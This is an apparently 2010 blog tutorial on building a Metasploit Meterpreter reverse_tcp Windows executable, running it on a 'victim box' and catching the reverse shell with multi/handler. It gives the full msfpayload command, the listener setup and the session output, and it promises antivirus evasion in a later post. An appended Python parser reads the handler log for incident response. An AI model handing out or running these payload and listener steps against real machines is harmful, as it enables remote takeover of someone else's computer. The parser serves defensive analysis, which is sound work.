
Saturday 27 November 2010

Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance

In this video I show you how to make a basic reverse TCP payload with Metasploit's Meterpreter.


A bit of info on The Metasploit Project:


"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/


This program is available for Windows and Linux (I tried using it on Windows and hated it) and is updated about daily.
It's one of the best free programs for pentesting/exploiting.


In the video I show you how to use the program on Linux; if you use it on Windows the commands could be slightly different.



In the video:


I show you how to make a basic reverse_tcp payload. Open a terminal and run this command:
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip address> LPORT=<your listening port> x > /root/<filename.exe> "


Explanation: 


LHOST is the address you want your exe to connect back to; this can be an internal or external IP. To find your internal IP on Linux, just open a terminal and type "ifconfig" and you shall see it.


LPORT is the port you want your exe to connect back to you on, so make sure it's forwarded properly.


The part " x > /root/<filename.exe> " is basically saying create an exe (" x ") and write it to " > /root/filename.exe ", which is your root folder on Linux. This exe will only work on Windows; there are the same payloads for other OSes, but as Windows is most common I will use this.


So an example would be this:
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "


There are extra commands which will encode your exe to help bypass AV (antivirus), but I will cover them in a later post, as this is intended as a very basic, first-glance look at it and how it works.


Next copy the exe you just created to the victim box. If you haven't noticed, I use virtual machines running BackTrack 4 and XP Pro.


So now we need to open a listener so we can listen for the exe connecting back and get a session.


Open the Metasploit console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"



msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...

So now we have a listening server running, waiting for the connect back.
Remember to set LHOST and LPORT to your own configuration.


When the exe is clicked and run you should get the connection, and it will look like this:

msf exploit(handler) > exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
 
meterpreter >


Now we have a meterpreter session and have full access :)
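For anyone reviewing a handler transcript like the one above from the other side (an incident responder reconstructing what happened), here is an added Python example that is not part of the original post: it parses the multi/handler output lines into a structured record and prints the session as the outbound flow a firewall or NetFlow log on the victim would show. The function and class names are my own; the sample transcript is constructed from the same lines the post shows.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample transcript in the same format as the handler output above.
SAMPLE_LOG = """\
msf exploit(handler) > exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
"""

HANDLER_RE = re.compile(r"^\[\*\] Started reverse handler on port (\d+)$")
STAGE_RE = re.compile(r"^\[\*\] Sending stage \((\d+) bytes\)$")
SESSION_RE = re.compile(
    r"^\[\*\] Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)$"
)


@dataclass
class Session:
    sid: int
    lhost: str   # handler (LHOST) address, left of the arrow
    lport: int   # handler listening port (LPORT)
    rhost: str   # victim address, right of the arrow
    rport: int   # ephemeral source port chosen by the victim

    def victim_side_flow(self) -> str:
        """The same connection as a host firewall or flow log on the victim records it:
        an outbound TCP connection from the victim to the handler."""
        return f"{self.rhost}:{self.rport} -> {self.lhost}:{self.lport} (outbound TCP)"


@dataclass
class HandlerSummary:
    listen_port: Optional[int] = None
    stage_bytes: Optional[int] = None
    sessions: list = field(default_factory=list)


def parse_handler_log(text: str) -> HandlerSummary:
    """Walk a multi/handler transcript line by line and pull out the listener port,
    the size of the stage the handler pushed, and every session that was opened."""
    summary = HandlerSummary()
    for raw in text.splitlines():
        line = raw.strip()
        if m := HANDLER_RE.match(line):
            summary.listen_port = int(m.group(1))
        elif m := STAGE_RE.match(line):
            summary.stage_bytes = int(m.group(1))
        elif m := SESSION_RE.match(line):
            summary.sessions.append(Session(int(m["sid"]), m["lhost"], int(m["lport"]),
                                            m["rhost"], int(m["rport"])))
    return summary
```

Note that the 72346-byte stage is sent by the handler right after the TCP connect, so on the victim's side the flow is a small outbound connection immediately followed by a large inbound transfer.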





